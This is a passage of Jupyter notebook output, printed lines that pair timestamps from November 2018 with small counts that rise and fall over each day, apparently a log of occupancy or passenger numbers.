"['2018-11-22 19:52:05', '0']\n",
"['2018-11-22 19:59:02', '2']\n",
"['2018-11-22 20:00:20', '2']\n",
"['2018-11-22 20:04:10', '3']\n",
"['2018-11-22 20:04:50', '3']\n",
"['2018-11-22 20:05:42', '4']\n",
"['2018-11-22 20:06:22', '4']\n",
"['2018-11-22 20:07:41', '5']\n",
"['2018-11-22 20:08:17', '5']\n",
"['2018-11-22 20:10:05', '4']\n",
"['2018-11-22 20:11:05', '4']\n",
"['2018-11-22 20:11:55', '5']\n",
"['2018-11-22 20:12:38', '5']\n",
"['2018-11-22 20:14:18', '4']\n",
"['2018-11-22 20:15:32', '4']\n",
"['2018-11-22 20:16:27', '7']\n",
"['2018-11-22 20:18:52', '7']\n",
"['2018-11-22 20:19:27', '8']\n",
"['2018-11-22 20:20:43', '8']\n",
"['2018-11-22 20:22:27', '8']\n",
"['2018-11-22 20:24:12', '12']\n",
"['2018-11-22 20:26:08', '12']\n",
"['2018-11-22 20:28:01', '7']\n",
"['2018-11-22 20:28:54', '9']\n",
"['2018-11-22 20:30:28', '7']\n",
"['2018-11-22 20:31:45', '9']\n",
"['2018-11-22 20:34:38', '5']\n",
"['2018-11-22 20:36:25', '6']\n",
"['2018-11-22 20:37:00', '3']\n",
"['2018-11-22 20:38:05', '9']\n",
"['2018-11-22 20:38:23', '10']\n",
"['2018-11-22 20:39:29', '10']\n",
"['2018-11-22 20:39:41', '12']\n",
"['2018-11-22 20:41:15', '14']\n",
"['2018-11-22 20:41:55', '12']\n",
"['2018-11-22 20:42:53', '12']\n",
"['2018-11-22 20:43:31', '10']\n",
"['2018-11-22 20:44:32', '3']\n",
"['2018-11-22 20:45:22', '0']\n",
"['2018-11-22 20:45:33', '0']\n",
"['2018-11-22 20:46:31', '0']\n",
"['2018-11-22 20:46:50', '0']\n",
"['2018-11-22 20:51:14', '0']\n",
"['2018-11-22 20:55:38', '0']\n",
"['2018-11-22 21:00:03', '2']\n",
"['2018-11-22 21:04:19', '2']\n",
"['2018-11-22 21:05:09', '4']\n",
"['2018-11-22 21:05:18', '4']\n",
"['2018-11-22 21:06:05', '8']\n",
"['2018-11-22 21:07:31', '11']\n",
"['2018-11-22 21:07:40', '10']\n",
"['2018-11-22 21:07:59', '11']\n",
"['2018-11-22 21:08:52', '11']\n",
"['2018-11-22 21:10:20', '13']\n",
"['2018-11-22 21:10:34', '15']\n",
"['2018-11-22 21:11:02', '15']\n",
"['2018-11-22 21:11:42', '13']\n",
"['2018-11-22 21:12:19', '14']\n",
"['2018-11-22 21:13:31', '13']\n",
"['2018-11-22 21:14:50', '15']\n",
"['2018-11-22 21:15:55', '19']\n",
"['2018-11-22 21:17:54', '18']\n",
"['2018-11-22 21:18:25', '19']\n",
"['2018-11-22 21:20:02', '19']\n",
"['2018-11-22 21:20:25', '20']\n",
"['2018-11-22 21:21:03', '19']\n",
"['2018-11-22 21:22:21', '17']\n",
"['2018-11-22 21:23:40', '19']\n",
"['2018-11-22 21:25:30', '19']\n",
"['2018-11-22 21:25:54', '19']\n",
"['2018-11-22 21:26:26', '18']\n",
"['2018-11-22 21:26:59', '16']\n",
"['2018-11-22 21:29:13', '16']\n",
"['2018-11-22 21:30:04', '16']\n",
"['2018-11-22 21:30:31', '16']\n",
"['2018-11-22 21:30:47', '14']\n",
"['2018-11-22 21:31:22', '15']\n",
"['2018-11-22 21:32:01', '11']\n",
"['2018-11-22 21:33:10', '11']\n",
"['2018-11-22 21:34:05', '5']\n",
"['2018-11-22 21:34:54', '0']\n",
"['2018-11-22 21:35:31', '0']\n",
"['2018-11-22 21:38:26', '0']\n",
"['2018-11-22 21:39:54', '0']\n",
"['2018-11-22 21:46:34', '3']\n",
"['2018-11-22 21:47:20', '3']\n",
"['2018-11-22 21:51:10', '7']\n",
"['2018-11-22 21:51:41', '7']\n",
"['2018-11-22 21:52:19', '5']\n",
"['2018-11-22 21:52:53', '6']\n",
"['2018-11-22 21:53:59', '6']\n",
"['2018-11-22 21:54:18', '4']\n",
"['2018-11-22 21:55:13', '5']\n",
"['2018-11-22 21:55:33', '4']\n",
"['2018-11-22 21:56:09', '2']\n",
"['2018-11-22 21:56:31', '2']\n",
"['2018-11-22 21:57:17', '2']\n",
"['2018-11-22 21:58:10', '2']\n",
"['2018-11-22 21:58:46', '2']\n",
"['2018-11-22 21:59:46', '2']\n",
"['2018-11-22 22:00:01', '2']\n",
"['2018-11-22 22:00:28', '2']\n",
"['2018-11-22 22:02:39', '2']\n",
"['2018-11-22 22:03:17', '2']\n",
"['2018-11-22 22:04:58', '2']\n",
"['2018-11-22 22:05:15', '2']\n",
"['2018-11-22 22:07:46', '2']\n",
"['2018-11-22 22:09:16', '2']\n",
"['2018-11-22 22:10:19', '0']\n",
"['2018-11-25 07:04:08', '3']\n",
"['2018-11-25 07:05:27', '4']\n",
"['2018-11-25 07:06:35', '4']\n",
"['2018-11-25 07:07:02', '7']\n",
"['2018-11-25 07:07:46', '9']\n",
"['2018-11-25 07:08:52', '8']\n",
"['2018-11-25 07:09:45', '9']\n",
"['2018-11-25 07:10:39', '11']\n",
"['2018-11-25 07:11:47', '11']\n",
"['2018-11-25 07:12:11', '11']\n",
"['2018-11-25 07:12:43', '11']\n",
"['2018-11-25 07:13:26', '11']\n",
"['2018-11-25 07:14:25', '11']\n",
"['2018-11-25 07:14:39', '12']\n",
"['2018-11-25 07:15:43', '13']\n",
"['2018-11-25 07:16:30', '13']\n",
"['2018-11-25 07:17:21', '13']\n",
"['2018-11-25 07:17:38', '13']\n",
"['2018-11-25 07:18:50', '13']\n",
"['2018-11-25 07:19:23', '13']\n",
"['2018-11-25 07:20:10', '13']\n",
"['2018-11-25 07:20:43', '13']\n",
"['2018-11-25 07:23:35', '5']\n",
"['2018-11-25 07:24:45', '0']\n",
"['2018-11-25 07:36:10', '5']\n",
"['2018-11-25 07:58:19', '16']\n",
"['2018-11-25 08:32:40', '5']\n",
"['2018-11-25 08:33:14', '16']\n",
"['2018-11-25 08:36:58', '16']\n",
"['2018-11-25 08:37:34', '16']\n",
"['2018-11-25 08:38:20', '16']\n",
"['2018-11-25 08:38:52', '18']\n",
"['2018-11-25 08:40:39', '18']\n",
"['2018-11-25 08:41:42', '18']\n",
"['2018-11-25 08:43:04', '18']\n",
"['2018-11-25 08:43:26', '19']\n",
"['2018-11-25 08:44:48', '19']\n",
"['2018-11-25 08:45:15', '20']\n",
"['2018-11-25 08:47:14', '19']\n",
"['2018-11-25 08:48:36', '17']\n",
"['2018-11-25 08:49:45', '17']\n",
"['2018-11-25 08:50:56', '17']\n",
"['2018-11-25 08:51:15', '17']\n",
"['2018-11-25 08:51:43', '16']\n",
"['2018-11-25 08:52:39', '17']\n",
"['2018-11-25 08:54:25', '15']\n",
"['2018-11-25 08:56:17', '12']\n",
"['2018-11-25 08:57:16', '12']\n",
"['2018-11-25 08:58:13', '10']\n",
"['2018-11-25 08:59:39', '10']\n",
"['2018-11-25 09:01:09', '4']\n",
"['2018-11-25 09:03:44', '4']\n",
"['2018-11-25 09:05:38', '4']\n",
"['2018-11-25 09:06:24', '4']\n",
"['2018-11-25 09:07:02', '3']\n",
"['2018-11-25 09:07:54', '3']\n",
"['2018-11-25 09:08:28', '2']\n",
"['2018-11-25 09:09:11', '2']\n",
"['2018-11-25 09:10:21', '2']\n",
"['2018-11-25 09:11:06', '2']\n",
"['2018-11-25 09:11:47', '1']\n",
"['2018-11-25 09:12:29', '1']\n",
"['2018-11-25 09:13:05', '1']\n",
"['2018-11-25 09:14:00', '1']\n",
"['2018-11-25 09:14:30', '1']\n",
"['2018-11-25 09:14:53', '1']\n",
"['2018-11-25 09:15:28', '1']\n",
"['2018-11-25 09:22:06', '1']\n",
"['2018-11-25 09:28:44', '0']\n",
"['2018-11-25 09:35:22', '2']\n",
"['2018-11-25 09:35:56', '3']\n",
"['2018-11-25 09:36:55', '6']\n",
"['2018-11-25 09:37:06', '6']\n",
"['2018-11-25 09:38:05', '6']\n",
"['2018-11-25 09:38:52', '8']\n",
"['2018-11-25 09:39:36', '8']\n",
"['2018-11-25 09:40:01', '9']\n",
"['2018-11-25 09:41:07', '9']\n",
"['2018-11-25 09:42:33', '13']\n",
"['2018-11-25 09:43:15', '13']\n",
"['2018-11-25 09:43:49', '17']\n",
"['2018-11-25 09:45:19', '17']\n",
"['2018-11-25 09:45:34', '17']\n",
"['2018-11-25 09:47:22', '17']\n",
"['2018-11-25 09:48:07', '17']\n",
"['2018-11-25 09:49:49', '14']\n",
"['2018-11-25 09:54:34', '15']\n",
"['2018-11-25 09:55:55', '16']\n",
"['2018-11-25 09:57:32', '15']\n",
"['2018-11-25 09:58:22', '15']\n",
"['2018-11-25 09:59:45', '18']\n",
"['2018-11-25 10:00:46', '18']\n",
"['2018-11-25 10:01:11', '17']\n",
"['2018-11-25 10:01:58', '18']\n",
"['2018-11-25 10:02:53', '18']\n",
"['2018-11-25 10:03:48', '18']\n",
"['2018-11-25 10:05:20', '18']\n",
"['2018-11-25 10:06:27', '18']\n",
"['2018-11-25 10:06:58', '18']\n",
"['2018-11-25 10:07:26', '18']\n",
"['2018-11-25 10:07:46', '16']\n",
"['2018-11-25 10:08:25', '17']\n",
"['2018-11-25 10:09:07', '15']\n",
"['2018-11-25 10:10:51', '15']\n",
"['2018-11-25 10:11:22', '15']\n",
"['2018-11-25 10:12:06', '15']\n",
"['2018-11-25 10:13:05', '15']\n",
"['2018-11-25 10:16:29', '4']\n",
"['2018-11-25 10:17:31', '0']\n",
"['2018-11-25 10:32:44', '2']\n",
"['2018-11-25 10:33:22', '5']\n",
"['2018-11-25 10:36:49', '5']\n",
"['2018-11-25 10:38:03', '7']\n",
"['2018-11-25 10:38:50', '7']\n",
"['2018-11-25 10:39:20', '11']\n",
"['2018-11-25 10:41:13', '11']\n",
"['2018-11-25 10:41:25', '12']\n",
"['2018-11-25 10:42:50', '12']\n",
"['2018-11-25 10:43:44', '11']\n",
"['2018-11-25 10:44:22', '11']\n",
"['2018-11-25 10:45:18', '13']\n",
"['2018-11-25 10:45:59', '14']\n",
"['2018-11-25 10:47:09', '14']\n",
"['2018-11-25 10:48:28', '14']\n",
"['2018-11-25 10:49:35', '14']\n",
"['2018-11-25 10:50:50', '14']\n",
"['2018-11-25 10:51:54', '18']\n",
"['2018-11-25 10:53:45', '18']\n",
"['2018-11-25 10:54:34', '14']\n",
"['2018-11-25 10:55:53', '11']\n",
"['2018-11-25 10:57:36', '11']\n",
"['2018-11-25 10:59:38', '8']\n",
"['2018-11-25 11:00:35', '9']\n",
"['2018-11-25 11:04:35', '2']\n",
"['2018-11-25 11:07:27', '6']\n",
"['2018-11-25 11:08:34', '7']\n",
"['2018-11-25 11:10:21', '2']\n",
"['2018-11-25 11:11:34', '2']\n",
"['2018-11-25 11:12:30', '2']\n",
"['2018-11-25 11:13:09', '2']\n",
"['2018-11-25 11:13:25', '2']\n",
"['2018-11-25 11:14:34', '2']\n",
"['2018-11-25 11:15:20', '2']\n",
"['2018-11-25 11:16:00', '1']\n",
"['2018-11-25 11:16:44', '1']\n",
"['2018-11-25 11:17:17', '1']\n",
"['2018-11-25 11:18:15', '1']\n",
"['2018-11-25 11:19:16', '0']\n",
"['2018-11-25 11:19:37', '0']\n",
"['2018-11-25 11:20:07', '0']\n",
"['2018-11-25 11:24:41', '0']\n",
"['2018-11-25 11:29:15', '0']\n",
"['2018-11-25 11:33:49', '1']\n",
"['2018-11-25 11:34:24', '2']\n",
"['2018-11-25 11:35:10', '3']\n",
"['2018-11-25 11:35:57', '8']\n",
"['2018-11-25 11:36:59', '8']\n",
"['2018-11-25 11:37:48', '9']\n",
"['2018-11-25 11:38:29', '8']\n",
"['2018-11-25 11:38:56', '8']\n",
"['2018-11-25 11:40:00', '8']\n",
"['2018-11-25 11:41:41', '8']\n",
"['2018-11-25 11:42:32', '8']\n",
"['2018-11-25 11:43:19', '10']\n",
"['2018-11-25 11:43:48', '10']\n",
"['2018-11-25 11:43:59', '7']\n",
"['2018-11-25 11:45:20', '10']\n",
"['2018-11-25 11:46:28', '11']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 11:50:01', '16']\n",
"['2018-11-25 11:52:17', '13']\n",
"['2018-11-25 11:53:11', '14']\n",
"['2018-11-25 11:54:25', '13']\n",
"['2018-11-25 11:55:34', '7']\n",
"['2018-11-25 11:57:11', '10']\n",
"['2018-11-25 11:59:00', '10']\n",
"['2018-11-25 12:00:17', '10']\n",
"['2018-11-25 12:00:53', '10']\n",
"['2018-11-25 12:01:17', '10']\n",
"['2018-11-25 12:02:18', '10']\n",
"['2018-11-25 12:03:27', '10']\n",
"['2018-11-25 12:04:46', '9']\n",
"['2018-11-25 12:05:33', '10']\n",
"['2018-11-25 12:06:36', '9']\n",
"['2018-11-25 12:06:49', '8']\n",
"['2018-11-25 12:07:55', '8']\n",
"['2018-11-25 12:08:39', '8']\n",
"['2018-11-25 12:09:50', '8']\n",
"['2018-11-25 12:10:51', '8']\n",
"['2018-11-25 12:11:42', '8']\n",
"['2018-11-25 12:12:16', '8']\n",
"['2018-11-25 12:15:18', '0']\n",
"['2018-11-25 12:16:24', '0']\n",
"['2018-11-25 12:33:25', '1']\n",
"['2018-11-25 12:33:57', '4']\n",
"['2018-11-25 12:37:41', '4']\n",
"['2018-11-25 12:38:24', '4']\n",
"['2018-11-25 12:39:20', '4']\n",
"['2018-11-25 12:40:06', '4']\n",
"['2018-11-25 12:41:37', '4']\n",
"['2018-11-25 12:41:50', '6']\n",
"['2018-11-25 12:43:15', '6']\n",
"['2018-11-25 12:44:07', '7']\n",
"['2018-11-25 12:44:38', '8']\n",
"['2018-11-25 12:45:28', '9']\n",
"['2018-11-25 12:46:36', '10']\n",
"['2018-11-25 12:47:41', '8']\n",
"['2018-11-25 12:48:52', '8']\n",
"['2018-11-25 12:50:02', '8']\n",
"['2018-11-25 12:50:13', '9']\n",
"['2018-11-25 12:52:53', '9']\n",
"['2018-11-25 12:54:15', '14']\n",
"['2018-11-25 12:55:05', '10']\n",
"['2018-11-25 12:56:19', '10']\n",
"['2018-11-25 12:56:36', '9']\n",
"['2018-11-25 12:58:54', '9']\n",
"['2018-11-25 12:59:07', '8']\n",
"['2018-11-25 13:01:52', '11']\n",
"['2018-11-25 13:04:49', '11']\n",
"['2018-11-25 13:05:46', '10']\n",
"['2018-11-25 13:06:48', '5']\n",
"['2018-11-25 13:08:06', '5']\n",
"['2018-11-25 13:08:29', '5']\n",
"['2018-11-25 13:09:06', '5']\n",
"['2018-11-25 13:09:23', '5']\n",
"['2018-11-25 13:10:55', '5']\n",
"['2018-11-25 13:11:41', '5']\n",
"['2018-11-25 13:12:23', '4']\n",
"['2018-11-25 13:13:04', '4']\n",
"['2018-11-25 13:13:39', '4']\n",
"['2018-11-25 13:14:45', '4']\n",
"['2018-11-25 13:15:29', '4']\n",
"['2018-11-25 13:15:42', '3']\n",
"['2018-11-25 13:16:37', '3']\n",
"['2018-11-25 13:21:34', '3']\n",
"['2018-11-25 13:26:32', '0']\n",
"['2018-11-25 13:31:30', '0']\n",
"['2018-11-25 13:32:14', '0']\n",
"['2018-11-25 13:32:41', '0']\n",
"['2018-11-25 13:32:55', '0']\n",
"['2018-11-25 13:33:29', '0']\n",
"['2018-11-25 13:34:09', '4']\n",
"['2018-11-25 13:35:04', '6']\n",
"['2018-11-25 13:35:37', '6']\n",
"['2018-11-25 13:37:03', '6']\n",
"['2018-11-25 13:39:06', '6']\n",
"['2018-11-25 13:39:53', '6']\n",
"['2018-11-25 13:40:40', '10']\n",
"['2018-11-25 13:41:44', '10']\n",
"['2018-11-25 13:42:00', '10']\n",
"['2018-11-25 13:43:03', '10']\n",
"['2018-11-25 13:43:52', '9']\n",
"['2018-11-25 13:49:55', '10']\n",
"['2018-11-25 13:51:35', '11']\n",
"['2018-11-25 13:52:14', '12']\n",
"['2018-11-25 13:53:17', '13']\n",
"['2018-11-25 13:54:04', '13']\n",
"['2018-11-25 13:55:19', '15']\n",
"['2018-11-25 13:57:10', '15']\n",
"['2018-11-25 13:58:05', '14']\n",
"['2018-11-25 13:59:29', '13']\n",
"['2018-11-25 14:00:15', '14']\n",
"['2018-11-25 14:01:15', '13']\n",
"['2018-11-25 14:01:50', '12']\n",
"['2018-11-25 14:04:27', '11']\n",
"['2018-11-25 14:04:44', '11']\n",
"['2018-11-25 14:05:48', '11']\n",
"['2018-11-25 14:06:02', '11']\n",
"['2018-11-25 14:07:04', '10']\n",
"['2018-11-25 14:08:02', '10']\n",
"['2018-11-25 14:09:21', '9']\n",
"['2018-11-25 14:10:21', '9']\n",
"['2018-11-25 14:11:14', '9']\n",
"['2018-11-25 14:11:49', '9']\n",
"['2018-11-25 14:14:52', '3']\n",
"['2018-11-25 14:15:59', '0']\n",
"['2018-11-25 14:30:58', '3']\n",
"['2018-11-25 14:31:44', '8']\n",
"['2018-11-25 14:35:32', '10']\n",
"['2018-11-25 14:36:15', '10']\n",
"['2018-11-25 14:37:39', '10']\n",
"['2018-11-25 14:38:15', '15']\n",
"['2018-11-25 14:40:10', '17']\n",
"['2018-11-25 14:40:22', '19']\n",
"['2018-11-25 14:41:50', '20']\n",
"['2018-11-25 14:42:40', '20']\n",
"['2018-11-25 14:43:37', '23']\n",
"['2018-11-25 14:44:24', '23']\n",
"['2018-11-25 14:45:47', '23']\n",
"['2018-11-25 14:46:52', '22']\n",
"['2018-11-25 14:48:00', '22']\n",
"['2018-11-25 14:49:00', '22']\n",
"['2018-11-25 14:49:16', '22']\n",
"['2018-11-25 14:49:42', '21']\n",
"['2018-11-25 14:50:36', '20']\n",
"['2018-11-25 14:51:27', '19']\n",
"['2018-11-25 14:53:32', '10']\n",
"['2018-11-25 14:55:05', '13']\n",
"['2018-11-25 14:57:18', '12']\n",
"['2018-11-25 14:58:00', '11']\n",
"['2018-11-25 15:01:42', '18']\n",
"['2018-11-25 15:03:58', '19']\n",
"['2018-11-25 15:05:26', '11']\n",
"['2018-11-25 15:06:16', '9']\n",
"['2018-11-25 15:07:23', '5']\n",
"['2018-11-25 15:08:58', '3']\n",
"['2018-11-25 15:09:57', '2']\n",
"['2018-11-25 15:10:42', '2']\n",
"['2018-11-25 15:12:00', '2']\n",
"['2018-11-25 15:12:47', '2']\n",
"['2018-11-25 15:13:36', '2']\n",
"['2018-11-25 15:13:46', '2']\n",
"['2018-11-25 15:14:51', '2']\n",
"['2018-11-25 15:15:49', '2']\n",
"['2018-11-25 15:16:23', '2']\n",
"['2018-11-25 15:16:44', '0']\n",
"['2018-11-25 15:17:49', '0']\n",
"['2018-11-25 15:21:12', '0']\n",
"['2018-11-25 15:24:36', '0']\n",
"['2018-11-25 15:28:00', '0']\n",
"['2018-11-25 15:28:38', '1']\n",
"['2018-11-25 15:29:42', '1']\n",
"['2018-11-25 15:29:52', '3']\n",
"['2018-11-25 15:30:53', '3']\n",
"['2018-11-25 15:31:41', '4']\n",
"['2018-11-25 15:32:16', '5']\n",
"['2018-11-25 15:33:16', '5']\n",
"['2018-11-25 15:33:58', '5']\n",
"['2018-11-25 15:36:17', '6']\n",
"['2018-11-25 15:36:35', '8']\n",
"['2018-11-25 15:37:29', '8']\n",
"['2018-11-25 15:38:42', '8']\n",
"['2018-11-25 15:39:01', '17']\n",
"['2018-11-25 15:40:49', '20']\n",
"['2018-11-25 15:42:00', '14']\n",
"['2018-11-25 15:45:44', '10']\n",
"['2018-11-25 15:48:56', '10']\n",
"['2018-11-25 15:50:51', '11']\n",
"['2018-11-25 15:52:23', '11']\n",
"['2018-11-25 15:52:40', '15']\n",
"['2018-11-25 15:53:55', '16']\n",
"['2018-11-25 15:55:46', '16']\n",
"['2018-11-25 15:56:27', '16']\n",
"['2018-11-25 15:57:10', '15']\n",
"['2018-11-25 15:57:35', '15']\n",
"['2018-11-25 15:58:35', '15']\n",
"['2018-11-25 15:59:11', '15']\n",
"['2018-11-25 16:01:45', '6']\n",
"['2018-11-25 16:02:47', '6']\n",
"['2018-11-25 16:03:20', '6']\n",
"['2018-11-25 16:03:40', '6']\n",
"['2018-11-25 16:04:32', '6']\n",
"['2018-11-25 16:04:52', '6']\n",
"['2018-11-25 16:06:09', '4']\n",
"['2018-11-25 16:07:12', '4']\n",
"['2018-11-25 16:08:04', '4']\n",
"['2018-11-25 16:08:39', '4']\n",
"['2018-11-25 16:11:44', '2']\n",
"['2018-11-25 16:12:56', '0']\n",
"['2018-11-25 16:26:41', '3']\n",
"['2018-11-25 16:27:24', '3']\n",
"['2018-11-25 16:31:26', '5']\n",
"['2018-11-25 16:32:11', '5']\n",
"['2018-11-25 16:33:03', '5']\n",
"['2018-11-25 16:33:46', '5']\n",
"['2018-11-25 16:35:15', '5']\n",
"['2018-11-25 16:36:08', '7']\n",
"['2018-11-25 16:37:51', '5']\n",
"['2018-11-25 16:38:37', '7']\n",
"['2018-11-25 16:39:44', '8']\n",
"['2018-11-25 16:40:33', '9']\n",
"['2018-11-25 16:42:08', '10']\n",
"['2018-11-25 16:42:52', '11']\n",
"['2018-11-25 16:44:07', '11']\n",
"['2018-11-25 16:45:16', '11']\n",
"['2018-11-25 16:45:34', '11']\n",
"['2018-11-25 16:46:40', '11']\n",
"['2018-11-25 16:47:07', '7']\n",
"['2018-11-25 16:48:12', '7']\n",
"['2018-11-25 16:51:01', '17']\n",
"['2018-11-25 16:52:24', '17']\n",
"['2018-11-25 16:54:32', '17']\n",
"['2018-11-25 16:55:57', '17']\n",
"['2018-11-25 16:57:29', '8']\n",
"['2018-11-25 17:00:10', '7']\n",
"['2018-11-25 17:01:12', '6']\n",
"['2018-11-25 17:02:21', '5']\n",
"['2018-11-25 17:03:29', '5']\n",
"['2018-11-25 17:03:51', '4']\n",
"['2018-11-25 17:04:31', '4']\n",
"['2018-11-25 17:04:47', '4']\n",
"['2018-11-25 17:06:30', '5']\n",
"['2018-11-25 17:07:18', '3']\n",
"['2018-11-25 17:08:28', '3']\n",
"['2018-11-25 17:09:11', '2']\n",
"['2018-11-25 17:09:53', '2']\n",
"['2018-11-25 17:10:52', '1']\n",
"['2018-11-25 17:11:30', '1']\n",
"['2018-11-25 17:11:48', '1']\n",
"['2018-11-25 17:12:50', '1']\n",
"['2018-11-25 17:18:13', '1']\n",
"['2018-11-25 17:23:36', '0']\n",
"['2018-11-25 17:29:00', '0']\n",
"['2018-11-25 17:29:55', '0']\n",
"['2018-11-25 17:30:27', '0']\n",
"['2018-11-25 17:30:41', '1']\n",
"['2018-11-25 17:31:09', '6']\n",
"['2018-11-25 17:32:27', '7']\n",
"['2018-11-25 17:33:07', '7']\n",
"['2018-11-25 17:34:09', '7']\n",
"['2018-11-25 17:36:42', '7']\n",
"['2018-11-25 17:38:43', '7']\n",
"['2018-11-25 17:39:07', '8']\n",
"['2018-11-25 17:39:56', '9']\n",
"['2018-11-25 17:40:55', '10']\n",
"['2018-11-25 17:41:04', '11']\n",
"['2018-11-25 17:43:16', '12']\n",
"['2018-11-25 17:44:40', '12']\n",
"['2018-11-25 17:47:08', '14']\n",
"['2018-11-25 17:49:27', '15']\n",
"['2018-11-25 17:52:05', '15']\n",
"['2018-11-25 17:52:35', '13']\n",
"['2018-11-25 17:53:23', '9']\n",
"['2018-11-25 17:54:29', '9']\n",
"['2018-11-25 17:55:57', '10']\n",
"['2018-11-25 17:58:15', '11']\n",
"['2018-11-25 17:59:00', '12']\n",
"['2018-11-25 17:59:27', '11']\n",
"['2018-11-25 18:00:27', '10']\n",
"['2018-11-25 18:01:26', '9']\n",
"['2018-11-25 18:04:01', '8']\n",
"['2018-11-25 18:04:22', '8']\n",
"['2018-11-25 18:05:25', '7']\n",
"['2018-11-25 18:06:10', '7']\n",
"['2018-11-25 18:07:34', '6']\n",
"['2018-11-25 18:07:57', '6']\n",
"['2018-11-25 18:09:19', '4']\n",
"['2018-11-25 18:10:25', '4']\n",
"['2018-11-25 18:11:25', '4']\n",
"['2018-11-25 18:12:07', '4']\n",
"['2018-11-25 18:15:57', '4']\n",
"['2018-11-25 18:17:09', '0']\n",
"['2018-11-25 18:25:53', '4']\n",
"['2018-11-25 18:26:58', '6']\n",
"['2018-11-25 18:31:13', '6']\n",
"['2018-11-25 18:32:30', '7']\n",
"['2018-11-25 18:33:52', '7']\n",
"['2018-11-25 18:34:41', '7']\n",
"['2018-11-25 18:36:16', '7']\n",
"['2018-11-25 18:36:28', '8']\n",
"['2018-11-25 18:38:06', '8']\n",
"['2018-11-25 18:38:56', '9']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 18:40:15', '11']\n",
"['2018-11-25 18:41:17', '13']\n",
"['2018-11-25 18:42:12', '14']\n",
"['2018-11-25 18:43:27', '14']\n",
"['2018-11-25 18:44:19', '14']\n",
"['2018-11-25 18:45:34', '15']\n",
"['2018-11-25 18:45:49', '16']\n",
"['2018-11-25 18:46:53', '17']\n",
"['2018-11-25 18:48:31', '17']\n",
"['2018-11-25 18:50:09', '19']\n",
"['2018-11-25 18:51:39', '27']\n",
"['2018-11-25 18:53:03', '28']\n",
"['2018-11-25 18:55:33', '27']\n",
"['2018-11-25 18:56:20', '28']\n",
"['2018-11-25 18:59:55', '16']\n",
"['2018-11-25 19:02:37', '21']\n",
"['2018-11-25 19:03:47', '19']\n",
"['2018-11-25 19:05:12', '13']\n",
"['2018-11-25 19:06:21', '12']\n",
"['2018-11-25 19:07:05', '12']\n",
"['2018-11-25 19:08:09', '10']\n",
"['2018-11-25 19:08:30', '10']\n",
"['2018-11-25 19:09:59', '10']\n",
"['2018-11-25 19:10:53', '10']\n",
"['2018-11-25 19:11:42', '6']\n",
"['2018-11-25 19:12:28', '5']\n",
"['2018-11-25 19:13:39', '5']\n",
"['2018-11-25 19:14:35', '5']\n",
"['2018-11-25 19:15:16', '2']\n",
"['2018-11-25 19:16:17', '2']\n",
"['2018-11-25 19:17:20', '5']\n",
"['2018-11-25 19:20:53', '3']\n",
"['2018-11-25 19:24:26', '0']\n",
"['2018-11-25 19:27:59', '3']\n",
"['2018-11-25 19:28:49', '3']\n",
"['2018-11-25 19:29:13', '3']\n",
"['2018-11-25 19:30:00', '0']\n",
"['2018-11-25 19:30:39', '0']\n",
"['2018-11-25 19:31:39', '0']\n",
"['2018-11-25 19:31:45', '1']\n",
"['2018-11-25 19:33:10', '1']\n",
"['2018-11-25 19:33:57', '1']\n",
"['2018-11-25 19:35:56', '1']\n",
"['2018-11-25 19:36:13', '1']\n",
"['2018-11-25 19:37:12', '1']\n",
"['2018-11-25 19:37:45', '1']\n",
"['2018-11-25 19:38:03', '1']\n",
"['2018-11-25 19:39:44', '1']\n",
"['2018-11-25 19:40:55', '1']\n",
"['2018-11-25 19:44:42', '6']\n",
"['2018-11-25 19:47:16', '6']\n",
"['2018-11-25 19:48:55', '6']\n",
"['2018-11-25 19:51:43', '6']\n",
"['2018-11-25 19:52:00', '7']\n",
"['2018-11-25 19:53:21', '8']\n",
"['2018-11-25 19:54:27', '7']\n",
"['2018-11-25 19:55:50', '7']\n",
"['2018-11-25 19:56:34', '7']\n",
"['2018-11-25 19:57:00', '7']\n",
"['2018-11-25 19:57:39', '7']\n",
"['2018-11-25 19:58:21', '6']\n",
"['2018-11-25 20:00:12', '7']\n",
"['2018-11-25 20:01:21', '7']\n",
"['2018-11-25 20:01:53', '6']\n",
"['2018-11-25 20:02:07', '6']\n",
"['2018-11-25 20:03:16', '5']\n",
"['2018-11-25 20:04:08', '5']\n",
"['2018-11-25 20:05:41', '4']\n",
"['2018-11-25 20:06:55', '4']\n",
"['2018-11-25 20:07:57', '4']\n",
"['2018-11-25 20:08:40', '4']\n",
"['2018-11-25 20:11:43', '1']\n",
"['2018-11-25 20:13:01', '0']\n",
"['2018-11-25 20:26:51', '1']\n",
"['2018-11-25 20:27:47', '6']\n",
"['2018-11-25 20:32:03', '6']\n",
"['2018-11-25 20:32:54', '6']\n",
"['2018-11-25 20:33:54', '6']\n",
"['2018-11-25 20:34:55', '6']\n",
"['2018-11-25 20:36:33', '6']\n",
"['2018-11-25 20:38:22', '6']\n",
"['2018-11-25 20:39:47', '6']\n",
"['2018-11-25 20:40:23', '6']\n",
"['2018-11-25 20:41:11', '6']\n",
"['2018-11-25 20:41:38', '8']\n",
"['2018-11-25 20:43:11', '8']\n",
"['2018-11-25 20:44:16', '7']\n",
"['2018-11-25 20:45:35', '7']\n",
"['2018-11-25 20:46:33', '8']\n",
"['2018-11-25 20:47:20', '8']\n",
"['2018-11-25 20:48:47', '8']\n",
"['2018-11-25 20:49:58', '8']\n",
"['2018-11-25 20:50:15', '9']\n",
"['2018-11-25 20:52:17', '8']\n",
"['2018-11-25 20:53:19', '10']\n",
"['2018-11-25 20:56:30', '12']\n",
"['2018-11-25 20:57:20', '11']\n",
"['2018-11-25 21:01:08', '19']\n",
"['2018-11-25 21:04:26', '19']\n",
"['2018-11-25 21:05:13', '19']\n",
"['2018-11-25 21:05:58', '21']\n",
"['2018-11-25 21:07:04', '21']\n",
"['2018-11-25 21:07:52', '21']\n",
"['2018-11-25 21:08:58', '11']\n",
"['2018-11-25 21:09:49', '11']\n",
"['2018-11-25 21:11:40', '11']\n",
"['2018-11-25 21:12:26', '11']\n",
"['2018-11-25 21:13:08', '8']\n",
"['2018-11-25 21:13:49', '7']\n",
"['2018-11-25 21:14:48', '6']\n",
"['2018-11-25 21:16:00', '4']\n",
"['2018-11-25 21:16:38', '2']\n",
"['2018-11-25 21:17:40', '1']\n",
"['2018-11-25 21:18:45', '1']\n",
"['2018-11-25 21:22:47', '1']\n",
"['2018-11-25 21:26:49', '0']\n",
"['2018-11-25 21:30:52', '2']\n",
"['2018-11-25 21:31:42', '2']\n",
"['2018-11-25 21:32:05', '0']\n",
